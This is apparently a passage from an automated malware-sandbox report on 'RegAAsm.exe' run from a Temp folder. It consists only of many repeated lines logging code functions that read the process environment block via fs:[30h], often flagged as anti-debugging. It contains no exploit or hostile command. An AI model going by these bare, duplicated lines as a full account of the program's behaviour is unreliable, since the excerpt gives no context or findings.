              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CB136 mov eax, dword ptr fs:[00000030h]5_2_013CB136
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D1131 mov eax, dword ptr fs:[00000030h]5_2_013D1131
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D1131 mov eax, dword ptr fs:[00000030h]5_2_013D1131
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A5152 mov eax, dword ptr fs:[00000030h]5_2_014A5152
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01468158 mov eax, dword ptr fs:[00000030h]5_2_01468158
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01469179 mov eax, dword ptr fs:[00000030h]5_2_01469179
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CF172 mov eax, dword ptr fs:[00000030h]5_2_013CF172
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CF172 mov eax, dword ptr fs:[00000030h]5_2_013CF172
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CF172 mov eax, dword ptr fs:[00000030h]5_2_013CF172
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CF172 mov eax, dword ptr fs:[00000030h]5_2_013CF172
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CF172 mov eax, dword ptr fs:[00000030h]5_2_013CF172
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CF172 mov eax, dword ptr fs:[00000030h]5_2_013CF172
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CF172 mov eax, dword ptr fs:[00000030h]5_2_013CF172
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CF172 mov eax, dword ptr fs:[00000030h]5_2_013CF172
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CF172 mov eax, dword ptr fs:[00000030h]5_2_013CF172
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CF172 mov eax, dword ptr fs:[00000030h]5_2_013CF172
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CF172 mov eax, dword ptr fs:[00000030h]5_2_013CF172
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CF172 mov eax, dword ptr fs:[00000030h]5_2_013CF172
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CF172 mov eax, dword ptr fs:[00000030h]5_2_013CF172
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CF172 mov eax, dword ptr fs:[00000030h]5_2_013CF172
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CF172 mov eax, dword ptr fs:[00000030h]5_2_013CF172
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CF172 mov eax, dword ptr fs:[00000030h]5_2_013CF172
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CF172 mov eax, dword ptr fs:[00000030h]5_2_013CF172
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CF172 mov eax, dword ptr fs:[00000030h]5_2_013CF172
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CF172 mov eax, dword ptr fs:[00000030h]5_2_013CF172
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CF172 mov eax, dword ptr fs:[00000030h]5_2_013CF172
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CF172 mov eax, dword ptr fs:[00000030h]5_2_013CF172
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01490115 mov eax, dword ptr fs:[00000030h]5_2_01490115
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0147A118 mov ecx, dword ptr fs:[00000030h]5_2_0147A118
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0147A118 mov eax, dword ptr fs:[00000030h]5_2_0147A118
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0147A118 mov eax, dword ptr fs:[00000030h]5_2_0147A118
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0147A118 mov eax, dword ptr fs:[00000030h]5_2_0147A118
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01400124 mov eax, dword ptr fs:[00000030h]5_2_01400124
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D6154 mov eax, dword ptr fs:[00000030h]5_2_013D6154
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D6154 mov eax, dword ptr fs:[00000030h]5_2_013D6154
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CC156 mov eax, dword ptr fs:[00000030h]5_2_013CC156
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D7152 mov eax, dword ptr fs:[00000030h]5_2_013D7152
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013C9148 mov eax, dword ptr fs:[00000030h]5_2_013C9148
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013C9148 mov eax, dword ptr fs:[00000030h]5_2_013C9148
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013C9148 mov eax, dword ptr fs:[00000030h]5_2_013C9148
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013C9148 mov eax, dword ptr fs:[00000030h]5_2_013C9148
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A51CB mov eax, dword ptr fs:[00000030h]5_2_014A51CB
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014961C3 mov eax, dword ptr fs:[00000030h]5_2_014961C3
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014961C3 mov eax, dword ptr fs:[00000030h]5_2_014961C3
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013EB1B0 mov eax, dword ptr fs:[00000030h]5_2_013EB1B0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140D1D0 mov eax, dword ptr fs:[00000030h]5_2_0140D1D0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140D1D0 mov ecx, dword ptr fs:[00000030h]5_2_0140D1D0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0144E1D0 mov eax, dword ptr fs:[00000030h]5_2_0144E1D0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0144E1D0 mov eax, dword ptr fs:[00000030h]5_2_0144E1D0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0144E1D0 mov ecx, dword ptr fs:[00000030h]5_2_0144E1D0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0144E1D0 mov eax, dword ptr fs:[00000030h]5_2_0144E1D0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0144E1D0 mov eax, dword ptr fs:[00000030h]5_2_0144E1D0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CA197 mov eax, dword ptr fs:[00000030h]5_2_013CA197
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CA197 mov eax, dword ptr fs:[00000030h]5_2_013CA197
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CA197 mov eax, dword ptr fs:[00000030h]5_2_013CA197
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A61E5 mov eax, dword ptr fs:[00000030h]5_2_014A61E5
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014001F8 mov eax, dword ptr fs:[00000030h]5_2_014001F8
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014771F9 mov esi, dword ptr fs:[00000030h]5_2_014771F9
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0148C188 mov eax, dword ptr fs:[00000030h]5_2_0148C188
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0148C188 mov eax, dword ptr fs:[00000030h]5_2_0148C188
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01410185 mov eax, dword ptr fs:[00000030h]5_2_01410185
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F51EF mov eax, dword ptr fs:[00000030h]5_2_013F51EF
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F51EF mov eax, dword ptr fs:[00000030h]5_2_013F51EF
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F51EF mov eax, dword ptr fs:[00000030h]5_2_013F51EF
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F51EF mov eax, dword ptr fs:[00000030h]5_2_013F51EF
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F51EF mov eax, dword ptr fs:[00000030h]5_2_013F51EF
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F51EF mov eax, dword ptr fs:[00000030h]5_2_013F51EF
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F51EF mov eax, dword ptr fs:[00000030h]5_2_013F51EF
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F51EF mov eax, dword ptr fs:[00000030h]5_2_013F51EF
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F51EF mov eax, dword ptr fs:[00000030h]5_2_013F51EF
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F51EF mov eax, dword ptr fs:[00000030h]5_2_013F51EF
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F51EF mov eax, dword ptr fs:[00000030h]5_2_013F51EF
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F51EF mov eax, dword ptr fs:[00000030h]5_2_013F51EF
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F51EF mov eax, dword ptr fs:[00000030h]5_2_013F51EF
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D51ED mov eax, dword ptr fs:[00000030h]5_2_013D51ED
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01427190 mov eax, dword ptr fs:[00000030h]5_2_01427190
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0145019F mov eax, dword ptr fs:[00000030h]5_2_0145019F
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0145019F mov eax, dword ptr fs:[00000030h]5_2_0145019F
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0145019F mov eax, dword ptr fs:[00000030h]5_2_0145019F
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0145019F mov eax, dword ptr fs:[00000030h]5_2_0145019F
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014811A4 mov eax, dword ptr fs:[00000030h]5_2_014811A4
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014811A4 mov eax, dword ptr fs:[00000030h]5_2_014811A4
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014811A4 mov eax, dword ptr fs:[00000030h]5_2_014811A4
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014811A4 mov eax, dword ptr fs:[00000030h]5_2_014811A4
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01456050 mov eax, dword ptr fs:[00000030h]5_2_01456050
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0147705E mov ebx, dword ptr fs:[00000030h]5_2_0147705E
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0147705E mov eax, dword ptr fs:[00000030h]5_2_0147705E
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CA020 mov eax, dword ptr fs:[00000030h]5_2_013CA020
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CC020 mov eax, dword ptr fs:[00000030h]5_2_013CC020
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013EE016 mov eax, dword ptr fs:[00000030h]5_2_013EE016
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013EE016 mov eax, dword ptr fs:[00000030h]5_2_013EE016
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013EE016 mov eax, dword ptr fs:[00000030h]5_2_013EE016
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013EE016 mov eax, dword ptr fs:[00000030h]5_2_013EE016
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A5060 mov eax, dword ptr fs:[00000030h]5_2_014A5060
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0145106E mov eax, dword ptr fs:[00000030h]5_2_0145106E
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0144D070 mov ecx, dword ptr fs:[00000030h]5_2_0144D070
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01454000 mov ecx, dword ptr fs:[00000030h]5_2_01454000
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FC073 mov eax, dword ptr fs:[00000030h]5_2_013FC073
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E1070 mov eax, dword ptr fs:[00000030h]5_2_013E1070
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E1070 mov ecx, dword ptr fs:[00000030h]5_2_013E1070
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E1070 mov eax, dword ptr fs:[00000030h]5_2_013E1070
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E1070 mov eax, dword ptr fs:[00000030h]5_2_013E1070
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E1070 mov eax, dword ptr fs:[00000030h]5_2_013E1070
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E1070 mov eax, dword ptr fs:[00000030h]5_2_013E1070
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E1070 mov eax, dword ptr fs:[00000030h]5_2_013E1070
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E1070 mov eax, dword ptr fs:[00000030h]5_2_013E1070
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E1070 mov eax, dword ptr fs:[00000030h]5_2_013E1070
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E1070 mov eax, dword ptr fs:[00000030h]5_2_013E1070
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E1070 mov eax, dword ptr fs:[00000030h]5_2_013E1070
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E1070 mov eax, dword ptr fs:[00000030h]5_2_013E1070
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E1070 mov eax, dword ptr fs:[00000030h]5_2_013E1070
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D2050 mov eax, dword ptr fs:[00000030h]5_2_013D2050
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FB052 mov eax, dword ptr fs:[00000030h]5_2_013FB052
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0149903E mov eax, dword ptr fs:[00000030h]5_2_0149903E
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0149903E mov eax, dword ptr fs:[00000030h]5_2_0149903E
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0149903E mov eax, dword ptr fs:[00000030h]5_2_0149903E
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0149903E mov eax, dword ptr fs:[00000030h]5_2_0149903E
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0144D0C0 mov eax, dword ptr fs:[00000030h]5_2_0144D0C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0144D0C0 mov eax, dword ptr fs:[00000030h]5_2_0144D0C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A50D9 mov eax, dword ptr fs:[00000030h]5_2_014A50D9
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014520DE mov eax, dword ptr fs:[00000030h]5_2_014520DE
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014560E0 mov eax, dword ptr fs:[00000030h]5_2_014560E0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D5096 mov eax, dword ptr fs:[00000030h]5_2_013D5096
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FD090 mov eax, dword ptr fs:[00000030h]5_2_013FD090
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FD090 mov eax, dword ptr fs:[00000030h]5_2_013FD090
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CD08D mov eax, dword ptr fs:[00000030h]5_2_013CD08D
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014120F0 mov ecx, dword ptr fs:[00000030h]5_2_014120F0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D208A mov eax, dword ptr fs:[00000030h]5_2_013D208A
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0145D080 mov eax, dword ptr fs:[00000030h]5_2_0145D080
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0145D080 mov eax, dword ptr fs:[00000030h]5_2_0145D080
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CC0F0 mov eax, dword ptr fs:[00000030h]5_2_013CC0F0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D80E9 mov eax, dword ptr fs:[00000030h]5_2_013D80E9
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F50E4 mov eax, dword ptr fs:[00000030h]5_2_013F50E4
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F50E4 mov ecx, dword ptr fs:[00000030h]5_2_013F50E4
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140909C mov eax, dword ptr fs:[00000030h]5_2_0140909C
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CA0E3 mov ecx, dword ptr fs:[00000030h]5_2_013CA0E3
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F90DB mov eax, dword ptr fs:[00000030h]5_2_013F90DB
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014680A8 mov eax, dword ptr fs:[00000030h]5_2_014680A8
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014960B8 mov eax, dword ptr fs:[00000030h]5_2_014960B8
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014960B8 mov ecx, dword ptr fs:[00000030h]5_2_014960B8
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E70C0 mov eax, dword ptr fs:[00000030h]5_2_013E70C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E70C0 mov ecx, dword ptr fs:[00000030h]5_2_013E70C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E70C0 mov ecx, dword ptr fs:[00000030h]5_2_013E70C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E70C0 mov eax, dword ptr fs:[00000030h]5_2_013E70C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E70C0 mov ecx, dword ptr fs:[00000030h]5_2_013E70C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E70C0 mov ecx, dword ptr fs:[00000030h]5_2_013E70C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E70C0 mov eax, dword ptr fs:[00000030h]5_2_013E70C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E70C0 mov eax, dword ptr fs:[00000030h]5_2_013E70C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E70C0 mov eax, dword ptr fs:[00000030h]5_2_013E70C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E70C0 mov eax, dword ptr fs:[00000030h]5_2_013E70C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E70C0 mov eax, dword ptr fs:[00000030h]5_2_013E70C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E70C0 mov eax, dword ptr fs:[00000030h]5_2_013E70C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E70C0 mov eax, dword ptr fs:[00000030h]5_2_013E70C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E70C0 mov eax, dword ptr fs:[00000030h]5_2_013E70C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E70C0 mov eax, dword ptr fs:[00000030h]5_2_013E70C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E70C0 mov eax, dword ptr fs:[00000030h]5_2_013E70C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E70C0 mov eax, dword ptr fs:[00000030h]5_2_013E70C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E70C0 mov eax, dword ptr fs:[00000030h]5_2_013E70C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A5341 mov eax, dword ptr fs:[00000030h]5_2_014A5341
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013C7330 mov eax, dword ptr fs:[00000030h]5_2_013C7330
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01452349 mov eax, dword ptr fs:[00000030h]5_2_01452349
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01452349 mov eax, dword ptr fs:[00000030h]5_2_01452349
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01452349 mov eax, dword ptr fs:[00000030h]5_2_01452349
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01452349 mov eax, dword ptr fs:[00000030h]5_2_01452349
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01452349 mov eax, dword ptr fs:[00000030h]5_2_01452349
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01452349 mov eax, dword ptr fs:[00000030h]5_2_01452349
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01452349 mov eax, dword ptr fs:[00000030h]5_2_01452349
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01452349 mov eax, dword ptr fs:[00000030h]5_2_01452349
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01452349 mov eax, dword ptr fs:[00000030h]5_2_01452349
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01452349 mov eax, dword ptr fs:[00000030h]5_2_01452349
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01452349 mov eax, dword ptr fs:[00000030h]5_2_01452349
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01452349 mov eax, dword ptr fs:[00000030h]5_2_01452349
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01452349 mov eax, dword ptr fs:[00000030h]5_2_01452349
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01452349 mov eax, dword ptr fs:[00000030h]5_2_01452349
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01452349 mov eax, dword ptr fs:[00000030h]5_2_01452349
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FF32A mov eax, dword ptr fs:[00000030h]5_2_013FF32A
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0145035C mov eax, dword ptr fs:[00000030h]5_2_0145035C
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0145035C mov eax, dword ptr fs:[00000030h]5_2_0145035C
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0145035C mov eax, dword ptr fs:[00000030h]5_2_0145035C
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0145035C mov ecx, dword ptr fs:[00000030h]5_2_0145035C
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0145035C mov eax, dword ptr fs:[00000030h]5_2_0145035C
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0145035C mov eax, dword ptr fs:[00000030h]5_2_0145035C
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0149A352 mov eax, dword ptr fs:[00000030h]5_2_0149A352
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CC310 mov ecx, dword ptr fs:[00000030h]5_2_013CC310
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0148F367 mov eax, dword ptr fs:[00000030h]5_2_0148F367
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F0310 mov ecx, dword ptr fs:[00000030h]5_2_013F0310
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0147437C mov eax, dword ptr fs:[00000030h]5_2_0147437C
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140A30B mov eax, dword ptr fs:[00000030h]5_2_0140A30B
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140A30B mov eax, dword ptr fs:[00000030h]5_2_0140A30B
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140A30B mov eax, dword ptr fs:[00000030h]5_2_0140A30B
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D7370 mov eax, dword ptr fs:[00000030h]5_2_013D7370
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D7370 mov eax, dword ptr fs:[00000030h]5_2_013D7370
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D7370 mov eax, dword ptr fs:[00000030h]5_2_013D7370
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0145930B mov eax, dword ptr fs:[00000030h]5_2_0145930B
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0145930B mov eax, dword ptr fs:[00000030h]5_2_0145930B
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0145930B mov eax, dword ptr fs:[00000030h]5_2_0145930B
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0149132D mov eax, dword ptr fs:[00000030h]5_2_0149132D
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0149132D mov eax, dword ptr fs:[00000030h]5_2_0149132D
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013C9353 mov eax, dword ptr fs:[00000030h]5_2_013C9353
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013C9353 mov eax, dword ptr fs:[00000030h]5_2_013C9353
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CD34C mov eax, dword ptr fs:[00000030h]5_2_013CD34C
